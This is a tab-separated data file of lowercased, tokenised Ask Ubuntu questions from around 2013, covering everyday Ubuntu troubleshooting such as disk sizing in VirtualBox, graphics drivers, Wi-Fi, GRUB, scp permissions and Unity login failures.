280015	ubuntu server reporting difference disk capacity than virtualbox	need help figuring out why ubuntu is mis-reporting disk capacity on a vm . just installed ubuntu 12.04 server lts 64 bit on a virtualbox ( version 4.2.10 ) virtual machine . i also installed the ubuntu desktop on this server . i created the virtual disk ( vdi option ) as 8gb with the dynamically allocated option . virtualbox currently reports the actual size at 1.7gb the ubuntu disk usage analyzer shows the drive has a total capacity of 4.2gb which makes no sense . i pulled this info from the command line and it does n't match the gui report . it adds up to just under 8gb which is right . i 'm unclear about why `` udev '' and `` tmpfs '' both are allocated at 2gb since this a new install . i installed gparted and it shows the extended partition correctly to be be 7.6gb . so why is the gui misreporting drive capacity and how do i fix this ? i ca n't install anything else because i 'm getting warnings in the desktop about there only being 25mb of space left . i already ran 'sudo apt-get clean ' and it did nothing . i also tried resizing the vdi disk itself from the my hosts command line but an error : c : \vboxmanage modifyhd ozzman2.vdi -- resize 20000 0 % ... progress state : vbox_e_not_supported vboxmanage.exe : error : resize hard disk operation for this format is not implemented yet !
280017	x.org loaded intel driver , disables everything else	i am trying to get my laptop to use my nvidia geforce gt 640m gpu . when i look at the `` software & updates > additional drivers '' panel it is completely empty . it looks like the problem is here : ubuntu-drivers debug === log messages from detection === debug : root : x.org log reports loaded intel driver , disabling driver nvidia-173 for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-173-updates for hybrid system debug : root : x.org log reports loaded intel driver , disabling driver nvidia-304 for hybrid system ... the output of lshw ( in case that helps ) : *-pci:0 description : pci bridge product : xeon e3-1200 v2/3rd gen core processor pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport:3000 ( size=4096 ) memory : d0000000-d1ffffff ioport : a0000000 ( size=536870912 ) *-display description : vga compatible controller product : gk107 [ geforce gt 640m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : d0000000-d0ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:3000 ( size=128 ) memory : b2000000-b207ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:48 memory : d2000000-d23fffff memory : c0000000-cfffffff ioport:4000 ( size=64 ) how do i force x to ignore the intel graphics and use the nvida gpu instead ?
280019	web page goes black after it is done loading on chrome	does anybody else have this ? it started today , with google.com among other webpages . it shows the page loading , and after it is done the whole page goes black . i can interact with the links and text on the page ( e.g . really wanted to read a page so i ctrl+a and copy/pasted it in gedit ) . i think it started just after i updated with the package manager , but i did n't look if chrome-stable had an update ( flash did though ) .
280020	ubuntu does n't see my phone ( sony xperia tipo )	when i connect my phone xperia tipo to my ubuntu 12.04 , the usb icon does not appear in a launcher . lsusb gives me following results : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 8086:0189 intel corp . bus 001 device 004 : id 1bcf:2880 sunplus innovation technology inc . bus 003 device 003 : id 0fce:5170 sony ericsson mobile communications ab i installed wammu and it does not see phone either : wammu is now searching for phone : all finished , found 0 phones no phone has been found ! on the phone i have debbugging turned on and it sees ubuntu . can i ask for instruction step by step ? i am a begginer on ubuntu .
280021	how to turn on wireless adapter ?	i installed ubuntu using a wired connection but now i am unable to connect via wireless network . i ca n't find any wireless network connection and i think the problem is that ubuntu turns my wireless adapter off , and the shortcut button ( pressing fn and f2 ) wo n't work in ubuntu . when i start up windows again i can see that the wireless adapter is switched off and i can back set it on by pressing these buttons ( it opens a window where i can turn on wifi as well l as bluetooth , probably an application from packard bell ) . i already installed ubuntu once with the wireless network and it worked fine .
280022	choose a suitable version of ubuntu	i need to choose a suitable version of ubuntu where the computer is very fast . my computer information : processor intel pentium 4 3.00ghz ( 2cbu ) 2046mb ram which version is available to me 12.4 or 12.10 ?
280023	network keeps disconnecting	my internet works fine when i 'm at home . it works fine doing lunch also , except doing lunch . my connection to the internet has problems . i 'm assuming that this is because everyone is using the internet at the same time , however , no one else has this problem that i have . the problem with the internet is i get frequently disconnected from the internet , then my computer tries to connect for a while , constantly asking me for the network password , until it 's able to connect , then it will stay connected for a while , until it suddenly disconnects again . this continues to repeat until lunch is over , then it works fine . some other notes : the majority of people using the internet is on a mac . i 'm guessing the modem itself is a mac product , but i 'm not certain . i do n't know how close to the modem i am , but other people would be in the same room as me , and their internet works just fine . this problem was happening while i was using ubuntu 12.10 , i decided to upgrade to the beta release of ubuntu 13.04 to see if the problem was fixed in a more stable release of ubuntu , but the problem still persists . i 'm assuming this could also be a hardware driver issue . i do n't really know what this means , or if it is helpful , but this is the information about networking with my laptop i could find . integrated 802.11 b/g/n built-in bluetoothâ˘ v3.0+hs ( optional ) 10/100/1000 base t can anyone describe to me what could be going on , and if there are any workarounds to get this working again ?
280025	help me set up zoneminder ?	zoneminder is a piece of software used to view/control surveillance cameras . i 'm about half way through installing and configuring it but i 've reached a dead end with my linux knowledge . i have got down to 'test with xawtv ' on this page , but i 'm getting lost there . if i try to run xawtv from terminal it returns : this is xawtv-3.102 , running on linux/x86_64 ( 3.5.0-27-generic ) xinerama 0 : 1280x1024+0+0 vid-open-auto : failed to open a capture device vid-open : could not find a suitable videodev no video grabber device available later on it says i can use gucview cheese or xawtv for testing the camera , i tried the others quickly but apt-get had n't heard of gucview and cheese seemed to want a local device , i.e . usb camera . ( could xawtv also be expecting a local device ? ) . maybe testing a network camera is n't actually possible ! i decided to push onward without testing the camera , the next instructions are found here , under 'start zoneminder ' : service httpd start service zoneminder start when trying to start the httpd service , i get unrecognized service in return . i tried to apt-get it and it told me that it 's part of another package of a long list . i think the most relevant of these will be four apache2 packages . apache2-mpm-itk 2.2.22-6ubuntu2.2 apache2-mpm-worker 2.2.22-6ubuntu2.2 apache2-mpm-prefork 2.2.22-6ubuntu2.2 apache2-mpm-event 2.2.22-6ubuntu2.2 now , i 'm getting way out of my depth here , the zoneminder wiki said that the .deb would include relevant apache stuff ... i 'm not sure if i should install any of these . if i try to start the zoneminder service it just says `starting zoneminder : failure i should add that the zoneminder in-browser control panel is working fine . ` so , this is quite a vague question and i ca n't really pinpoint what the problem is , i 'm just lost in it all . any help is greatly appreciated .
280026	how do i hide an entry from grub ?	i dual boot with windows xp and ubuntu 12.04 lts . i rarely use windows . i want to remove the windows entry from grub menu . i do n't want to remove windows , i just want to remove the entry . the purpose is other users should not log into windows . these other users are non-tech savy and they bring malware . asking them to boot into ubuntu is not helping . all they use is web browser . so removing the entry will make them unable to boot into windows . better still they might assume windows is removed . but i can still use grub command line to boot into windows . i use windows for testing hardware issues or ie only sites and other weird situation to confirm my idea on what went wrong .
280027	ca n't boot windows 7 after installing ubuntu 12.04	i installed ubuntu 12.04 64 bit yesterday and now i ca n't boot my windows 7 . what can i do now ?
280031	libgl.so.1 : can not open shared object and skype does n't start	$ uname -a linux homebook 3.8.0-17-generic # 27-ubuntu smp sun apr 7 19:39:35 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo find / -name libgl.so.1 /usr/lib32/nvidia-304/libgl.so.1 /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 /usr/lib/nvidia-304/libgl.so.1 /usr/lib/i386-linux-gnu/mesa/libgl.so.1 $ skype skype : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory
280032	installed kernel , and printer driver - no unity ?	i ran installation of printer drives for epson stylus s22 ( from original website ) the most recent installs are : 2013-04-10 12:06:53 install linux-image-3.5.0-27-generic : amd64 < none > 3.5.0-27.46 2013-04-10 12:07:05 install linux-image-extra-3.5.0-27-generic : amd64 < none > 3.5.0-27.46 2013-04-10 12:20:26 install libqt4-opengl : amd64 < none > 4:4.8.3+dfsg-0ubuntu3.1 2013-04-10 12:20:27 install dpkg-dev : all < none > 1.16.7ubuntu6 2013-04-10 12:20:28 install html2text : amd64 < none > 1.3.2a-15build1 2013-04-10 12:20:29 install po-debconf : all < none > 1.0.16+nmu2ubuntu1 2013-04-10 12:20:30 install dh-apparmor : all < none > 2.8.0-0ubuntu5 2013-04-10 12:20:30 install debhelper : all < none > 9.20120608ubuntu1 2013-04-10 12:20:32 install librpmio3 : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:33 install librpm3 : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:34 install librpmbuild3 : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:34 install librpmsign1 : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:35 install rpm-common : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:36 install rpm2cpio : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:36 install rpm : amd64 < none > 4.10.0-4ubuntu0.1 2013-04-10 12:20:37 install alien : all < none > 8.88 2013-04-10 12:20:38 install libstdc++6-4.7-dev : amd64 < none > 4.7.2-2ubuntu1 2013-04-10 12:20:40 install g++-4.7 : amd64 < none > 4.7.2-2ubuntu1 2013-04-10 12:20:41 install g++ : amd64 < none > 4:4.7.2-1ubuntu2 2013-04-10 12:20:43 install build-essential : amd64 < none > 11.5ubuntu3 2013-04-10 12:20:43 install heirloom-mailx : amd64 < none > 12.5-2 2013-04-10 12:20:44 install libc6-i386 : amd64 2.15-0ubuntu20 2.15-0ubuntu20 2013-04-10 12:20:46 install lib32z1 : amd64 < none > 1:1.2.7.dfsg-13 2013-04-10 12:20:47 install libalgorithm-diff-perl : all < none > 1.19.02-2 2013-04-10 12:20:47 install libalgorithm-diff-xs-perl : amd64 < none > 0.04-2build3 2013-04-10 12:20:48 install libalgorithm-merge-perl : all < none > 0.08-2 2013-04-10 12:20:49 install libjpeg62 : amd64 < none > 6b1-2ubuntu2 2013-04-10 12:20:49 install libsys-hostname-long-perl : all < none > 1.4-2 2013-04-10 12:20:50 install libmail-sendmail-perl : all < none > 0.79.16-1 2013-04-10 12:20:51 install libqt4-gui : amd64 < none > 4:4.8.3+dfsg-0ubuntu3.1 2013-04-10 12:20:51 install m4 : amd64 < none > 1.4.16-3 2013-04-10 12:20:52 install pax : amd64 < none > 1:20120606-2 2013-04-10 12:20:53 install lsb-invalid-mta : all < none > 4.0-0ubuntu26.1 2013-04-10 12:20:54 install lsb-core : amd64 < none > 4.0-0ubuntu26.1 2013-04-10 12:20:54 install lsb-graphics : amd64 < none > 4.0-0ubuntu26.1 2013-04-10 12:20:55 install lsb-cxx : amd64 < none > 4.0-0ubuntu26.1 2013-04-10 12:20:55 install lsb-desktop : amd64 < none > 4.0-0ubuntu26.1 2013-04-10 12:20:56 install lsb-printing : amd64 < none > 4.0-0ubuntu26.1 2013-04-10 12:20:57 install lsb : all < none > 4.0-0ubuntu26.1 after rebooting , i get to login screen . i proceed to login , and all i see was my background , and my mouse ( i was able to open a terminal by ctrl- alt-f2 . i suspected this to be my newly installed kernel . ( 3.5.0-27 ) . i therefore rolled back , to -26 kernel . ( removing the image from /boot and running update-grub2 ) seeing i 'm completely lost on this , i may not have given sufficient information . feel free to comment , about any information , logs or anything you 'll need .
280035	how to investigate scheduler issues ?	i have a server process that should runs multiple threads at close to 100 % , each on its own cpu . when i run the process on a rhel box , the cpus in question appear to stay pegged at 100 % , according to top . however , when i run my process on an ubuntu 12.04 box , the cpus are only at 100 % around a half of the time , and the rest of the time drop to 50 % or lower and bounce around . how should i investigate the relevant scheduler , interrupt and other issues that might be contributing to this problem ?
280036	is the lock screen secure enough to prevent `` mallory '' from accessing the encrypted drive ?	i use truecrypt to encrypt one of my drives and i would want to leave the computer running processes that use information of that drive while i 'm not home , i 've tried suspending it but everything stops , i 've also tried logging out but all processes are closed . so is locking the computer ( ctrl+alt+ : l ) the only possibility of achieving what i want ?
280044	i recently installed ubuntu desktop gui over my ubuntu server install and i broke some bash commands	i have been running a virtualbox of ubuntu server for web development and have been getting along quite nicely . i decided to install ubuntu desktop via `` sudo apt-get install ubuntu-desktop '' so i can use sublime text until i get better with vim . i have been ssh into my vm from putty , and had my .bashrc set up how i liked it . now that i have the gui installed though , many bash commands are n't working and my shell settings are different . for example , 'ls ' now gives me this error : ls : can not access .color=auto : no such file or directory i have verified that i am using /bin/bash via : echo $ shell i believe it has something to do with using a non-login version of bash vs a login version over ssh , but i have tried sourcing the .bashrc and .profile to no avail . what am i doing wrong ?
280056	ca n't delete or use unallocated partition	i have a couple of very small unallocated partitions that i can not delete or merge with adjacent partitions . i have tried gparted on live gparted cd and from the gparted app on ubuntu live cd as well as from windows drive management . the delete option is greyed out . the partitions are very small but just should n't be there . i think they are remnants from old linux installations . any help on cleaning this up would be appreciated .
280059	wps kingsoft not running	installed wps kingsoft on my ubuntu 12.10 64bit from a .deb package downloaded from omgubuntu but when i execute any for the three files ( writer , spreadsheet or powerpoint ) nothing happens . anyone has a workaround for this ?
280062	how to install keepassx 2.0 alpha on ubuntu	on the keepassx site there is only a linux version 0.4.3 for download . how can i install the latest version on ubuntu ? the problem is , that version 0.4 is basically unmaintained . see : https : //www.keepassx.org/dev/issues/78 # change-186
280065	need wireless drivers for dell latitude e5420	i have an dell latitude e5420 with ubuntu 12.10 . i need my wireless to work . where can i can get the driver or how can i get the wifi working ?
280072	very basic command line question	i 'm very new to ubuntu ( and linux ) . i forgot my main password and looked up how to delete it and now i 'm at a root menu screen that says `` -d , -- delete '' . my question is what do i actually need to type at the command prompt ? typding `` d '' `` -d '' and all other variations i could think of did n't work . i 'm pretty sure there 's some code/shorthand here that i 'm not familiar with . the instructions did n't work for me because when i typed `` passwd andrew '' it came back with a list of commands instead of asking for a new password . one of the command options on the list that came up was the one to delete the password , which would be fine , but i do n't know the proper way to enter the command . i got to that menu by going into recovery mode , then to the root menu , and then entering `` passwd andrew '' . thanks .
280073	ubuntu one on the mac always resets the permission on an update	here is what is does : -rwxr-xr-x 1 heyl staff 2199 apr 9 10:13 /users/heyl/bin/scramble.pl becomes -rw-r -- r -- 1 heyl staff 2200 apr 10 15:23 /users/heyl/bin/scramble.pl after ubuntu one performs the update . is there a way to get ubuntu one either to preserve the permissions or copy them over ?
280077	unity wo n't start after login	i 'm having some troubles getting unity working again.. this problem came after i installed ubuntu updates and removing some repositories ( gwibber-daily and some google chrome repos ) , then i restarted my system , typed the login normaly and then i just get my wallpaper and cursor , i ca n't select anything or access to right-click menu , i just can open the console ( ctrl+alt+t ) and control the volume ( volume notification appears ) . before i opened this thread , i 've been searching around the web and i tryed several solutions like installing compizconfig ( ccsm ) and select unity plugin , restart compiz and unity , etc but nothing solves my problem.. i also reinstalled unity and it did n't work too . when i type on console the command setsid unity to restart unity i get this output : daniel @ daniel-pc : ~ $ setsid unity daniel @ daniel-pc : ~ $ compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : nenhum processo localizado ( translate : no process located ) compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . compiz ( core ) - info : starting plugin : opengl libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( expo ) - warn : failed to bind image to texture compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported compiz ( core ) - error : plugin initscreen failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell compiz ( core ) - info : unloading plugin : unityshell x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 18 ( x_changeproperty ) resource id in failed request : 0x2600162 serial number of failed request : 9390 current serial number in output stream : 9396 i 'm not a real expert , but i can see there are some errors that do n't let unity start.. my question is , what can i do to get my normal desktop again ? since steam for linux have been released i 've formated my old windowsucks partition and installed a fresh new ubuntu environment and i liked it , it 's fast , beauty but this unstable situations sucks , in a moment is everything ok and then this : / sorry for my bad english but i 'm a portuguese guy who need to practise his english : d thanks in advance
280078	ubuntu on asus k53tk laptop overheating	i installed latest ubuntu distribution , and my laptop is overheating . the fan is always at like 60 % power , decreases 1 min then again it start to 60 % . it is not a laptop issue , isnt dirty with dust inside , ive just cleaned out , and in windows the temperatures are as expected , 40 idle , 80 full throttle . and as far as i know , an ubuntu working laptop should be less heated then a windows one , if both are fresh installs . i think it is something from the apu with 7670m video card . laptop spec - amd a6 3420m , 4 gb ram , 6520g+7670m video card . hope you can understand my issue even my english isnt too good . good luck everyone , and great job !
280084	how to remove file logicaly ?	i have a file on my computer which was called just one.flv , i deleted this file but the problem here is that the icon of the file still appeared and when i try to do any operation on it from terminal , this message appeared no such file or directory . now i ca n't do any operation on it . i ca n't copy or rename or cut or delete . i tried : rm -f 'just one.flv' to force delete . any help ?
280085	howto play last.fm on rhythmbox ?	so after authenticating with last.fm , the last.fm drop-down menu is populated but when attempting to listen to a station nothing is happening . i 'm hoping that i 'm just not doing something right.. let me know askubuntu in newb detail howto get this thing playn last.fm music please . : )
280093	how do i copy files with scp to /var/www ?	i need to copy files from my computer to my server 's folders in /var/www so they are uploaded to my cloud . here 's what i try to do : i open my computer 's terminal and type : scp /media/user/files/documents/documents.docx ubuntu @ mywebsite.com : /var/www/documents notes on this step the hard drive that i am trying to copy the file from is an ntfs formatted drive . i use this drive to store all my media on , in other words it has no operating system on it . i use a separate ssd with dual boot for my operating system . also , this drive is mounted when i do this . 'ubuntu ' is the actual username of the server i am trying to copy to . then it asks me for that computers password and then i get : scp : /var/www/documents/documents.docx : permission denied what 's wrong here ? other notes after much googling , i found it may be a permission issue , so i tried the various solutions with no luck . the most common solution i tried was adding a user to the group . i would add the server 's user ( ubuntu ) to the group , but that did n't help . am i supposed to add my computer 's username to the group ? if so , do i add the stuff before the colon , after the colon , or both ? i understand that one method to get around this would be to copy the files to my server 's home directory , and then cp them to /var/www through ssh , but i would rather not do that because its an extra step . any help would be greatly appreciated ! thank you !
280098	ubuntu stuck on boot	when i start up or restart my computer , i see the gray underscore in the top-left corner , flashing as it should . sometimes though , it just keeps flashing , and the system does n't start . if i try to boot in recovery mode , i can see the text log instead . from there , it gets stuck at a few common points . again , it 's just stuck there until i reboot it . anyway , this only seems to happen on linux . it did n't happen with this computer under windows 7 . i 've also had this computer for quite a bit , so i 've already gone through plenty of amd drivers and kernels . i do n't think those are the issue . any help , or logs or something that i should be looking at ? i 'm using an amd a8-3850 with the 6550d . proprietary drivers , though it still occurred under the open source drivers . i can provide more information if it 's needed . thanks .
280100	why cant i connect to 5ghz with my b/g/n wifi card ?	i have a realtek rtl8188ce 802.11b/g/n on my quantal amd64 system . i installed the kernel modules for that card and modprobe that module . i can only view to the 2.4ghz wlans . the module im talking about was downloaded from the realtek page . here is some good info . well my configuration .
280101	booting ubuntu 12.10 from usb to fix boot manager and get the running in low graphics mode	ok , so i already installed ubuntu 12.10 a little while ago and while trying to fix windows ( main os ) microsoft had me do the start up repair which erased or made the boot manager disappear ( not sure a little bit of a linux noob here ) . so i looked up instructions on how to reinstall it and when i went through the process and went to boot from the hard drive , the grub 2.0 screen came up and has the grub > press tab for a list of commands thing and i have no idea what to do with that . after that i went back and booted the usb up again and after clicking try ubuntu it now comes up with `` installation encountered and error and will start the desktop so you can try to fix the error '' . before that it also comes up with the box that says you have low space space with the options to examine or skip and before i can do anything brings up the installation error . then when i click ok to the installation error the screen blinks and it comes up saying im running in low graphics mode with a few options and i ca n't go anywhere from there . tried ctrl alt f1 to get into terminal but just brings me to a black screen with a line or couple ( has been different on different boots ) and no way to enter in commands ( although i think you can type in it ) but its not the normal terminal whatever it is . not sure what to do here . looked through a bunch of threads on here with similar problems but most of them were actually installing ubuntu again , for the first time or something different . so thanks in advance to anyone that can share their knowledge of this problem . by the way , i 'm not sure if theres a way , but im not able to boot into windows right now . i know the description is basic but i figured most of this stuff is familiar since there 's many threads with this simaler problem but if anyone needs anymore details feel free to ask i 'll be monitering .
280103	13.04 login : lagging after password entry for several seconds	when i login to my ubuntu 13.04 beta2 ( std unity ) session , after i enter the password , there is a deferral of some seconds which is not there on my 12.04 . lts partition . can this be related to the dmesg output : [ 37.101723 ] systemd-logind [ 2350 ] : new seat seat0 . [ 37.101785 ] systemd-logind [ 2350 ] : failed to save seat data for seat0 : no such file or directory and if so , what does it mean ? i tried to google that lines but could not find any helpful references . using aptitude gave me the following information : aptitude search systemd p libpam-systemd - system and service manager - pam module p libpam-systemd : i386 - system and service manager - pam module p libsystemd-daemon-dev - systemd utility library - development files p libsystemd-daemon-dev : i386 - systemd utility library - development files i libsystemd-daemon0 - systemd utility library p libsystemd-daemon0 : i386 - systemd utility library p libsystemd-id128-0 - systemd 128 bit id utility library p libsystemd-id128-0 : i386 - systemd 128 bit id utility library p libsystemd-id128-dev - systemd 128 bit id utility library - development p libsystemd-id128-dev : i386 - systemd 128 bit id utility library - development p libsystemd-journal-dev - systemd journal utility library - development files p libsystemd-journal0 - systemd journal utility library p libsystemd-journal0 : i386 - systemd journal utility library p libsystemd-login-dev - systemd login utility library - development file p libsystemd-login-dev : i386 - systemd login utility library - development file p libsystemd-login0 - systemd login utility library p libsystemd-login0 : i386 - systemd login utility library p live-config-systemd - live system configuration scripts ( systemd backend ) p python-systemd - python bindings for the systemd journal p python-systemd : i386 - python bindings for the systemd journal i systemd-services - systemd runtime services p systemd-services : i386 - systemd runtime services i systemd-shim - shim for systemd p systemd-shim : i386 - shim for systemd
280108	a linux container can use an authorized_keys file outside my home directory , but ephemeral containers based on it ca n't . why ?	in ubuntu 12.10 , i 've created an lxc of type 'ubuntu ' using the lxc-create utility . i then create ephemeral containers based on this container using the lxc-start-ephemeral utility , and i need to connect to those using password-less ssh . however , i need to keep their /home/ubuntu folders pristine , so i ca n't put the usual .ssh/authorized_keys file in there . the 'encrypted home directory ' section here tells me how to move authorized_keys out of the home directory . after i follow those instructions from inside the base container , i can ssh into the base container without giving a password . however , when i launch an ephemeral container from the base container , i ca n't ssh in without a password . ( confusingly , passwordless ssh to the ephemeral container does work when authorized_keys is in its usual place in /home/ubuntu/.ssh . ) how can i fix this ? here 's what ssh -v said , starting from when it accepts the host key : debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/ubuntu/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/ubuntu/.ssh/id_dsa debug1 : trying private key : /home/ubuntu/.ssh/id_ecdsa debug1 : next authentication method : password here are the relevant portions of /var/log/auth.log on the ephemeral container : apr 11 00:06:52 test-temp-snewevo sshd [ 306 ] : authentication refused : bad ownership or modes for directory / apr 11 00:06:54 test-temp-snewevo sshd [ 306 ] : accepted password for ubuntu from 10.0.3.1 port 59677 ssh2 apr 11 00:06:54 test-temp-snewevo sshd [ 306 ] : pam_env ( sshd : setcred ) : unable to open env file : /etc/default/locale : no such file or directory apr 11 00:06:54 test-temp-snewevo sshd [ 306 ] : pam_unix ( sshd : session ) : session opened for user ubuntu by ( uid=0 ) i did this test on a fresh aws micro instance based on the standard ubuntu 12.10 ami , and can provide detailed instructions on how to reproduce it if that helps .
280109	grub on start up changed color from purple to black ?	a while ago , i reinstalled 12.04 on my computer and a few day later when my system restarts after updating itself , the grub is no longer purple . it is just black and i did n't change anything that could do that . my system works fine and there is no problems with anything . i just do n't like looking at a black grub while waiting in the booting process . can you change the grub back to being purple or choose a different color ?
280111	can not get flash to work in firefox or chromium , and can not upgrade to 12.10 lts	i can not get flash to load for either firefox or chromium . so i tried updating to 12.10 lts , but i do not show any distribution updates available . i 'm running 12.04 lts on another computer , and it not only works fine , but has been receiving updates over the last several days . yet this computer does not show any . i have a hunch there are some missing updates , but i have not been able to find them . any suggestions ? thanks !
280112	how to hide icons from system settings ?	i installed ubuntu tweak and noticed an icon for it in system settings . is it possible to hide the icon ?
280115	ubuntu as a router/gateway - unable to access wan	i am currently trying to set up a home router using a machine running ubuntu 12.04 . the machine has two ethernet ports . eth0 is lan and eth1 is wan . i have set eth0 to a static ip and have eth1 request an ip via dhcp . /etc/network/interface auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.1.1.10 netmask 255.255.255.0 gateway 10.1.1.10 dns-nameservers 10.1.1.1 10.1.1.10 auto eth1 iface eth1 inet dhcp this allows me to ping lan computers , but i am unable to ping or access any external hosts . the modem is giving eth1 a valid ip address . the machine is setting it 's lan ip to 10.1.1.10 ( to be moved to 10.1.1.1 when everything is working ) . i have added the following to /etc/bind/named.conf.options : forwarders { 8.8.8.8 ; 8.8.4.4 ; } ; net.ipv4.ip_forward=1 has been added to /etc/sysctl.conf . $ route kernel ip routing table destination gateway genmask flags metric ref use iface default vanir.local 0.0.0.0 ug 100 0 0 eth0 10.1.1.0 * 255.255.255.0 u 0 0 0 eth0 98.162.168.0 * 255.255.252.0 u 0 0 0 eth1 link-local * 255.255.0.0 u 1000 0 0 eth0 does anybody see what i 'm missing in order to allow both wan and lan traffic on my machine ?
280116	why does japanese text show up with chinese glyphs ?	this seems to be a long-standing ubuntu problem , i 've experienced it since years ago if i remember correctly . i have language support for both chinese and japanese installed ( and want to keep it that way -- i do know though that the problem can be `` resolved '' by uninstalling chinese fonts , i have experimented with that ) . the problem is that japanese text shows as chinese glyphs . not for every single japanese character , but presumably for ones that the system thinks has a corresponding glyph in chinese . this happens in all applications : libreoffice , browsers , gedit , terminal etc . ( this problem is not about input methods . ) fonts installed : chinese ( and japanese ) fonts-arphic-ukai font-arphic-uming ttf-wqy-microhei ttf-wqy-zenhei japanese fonts-takao-gothic fonts-takao-mincho fonts-takao-pgothic others that seem to support japanese/chinese fonts-droid steps to reproduce : install fonts/support for both japanese and chinese , and then type japanese character . you need to be able to recognize differences between glyphs from the two languages to see this problem . examples : 誤り、直す ( will upload pictures . )
280122	how can i redirect keyboard input ( stdin ) to audio device ?	i 'd like to know how can i redirect my keyboard input to my audio device .
280123	rotating text on a vertical xfce panel	i just discovered the vertical orientation for xfce panels , but i 'd like the text on the panel applets to be rotated counterclockwise , rather than clockwise . is this possible ?
280124	install jdk in ubuntu	i am trying to install oracle jdk7 64bit on my computer . and i found this how do i install oracle java jdk 7 ? however i found that it use the update-alternative -install to install the jdk which is new to me . i used to only extract the files and add the jdk location to the path environment variable before . now , it seems that i have to run the following commands more than once if i want to install other executables : sudo update-alternatives -- install `` /usr/bin/xx '' `` xx '' `` /usr/lib/jvm/jdk1.7.0/bin/xx '' 1 sudo chmod a+x /usr/bin/xx just like the post said : n.b . remember - java jdk has many more executables that you can similarly install as above . java , javac , javaws are probably the most frequently required . so i think this is rather inflexible . then i want to know what is the advantage to use the update-alternative to install jdk or something else ?
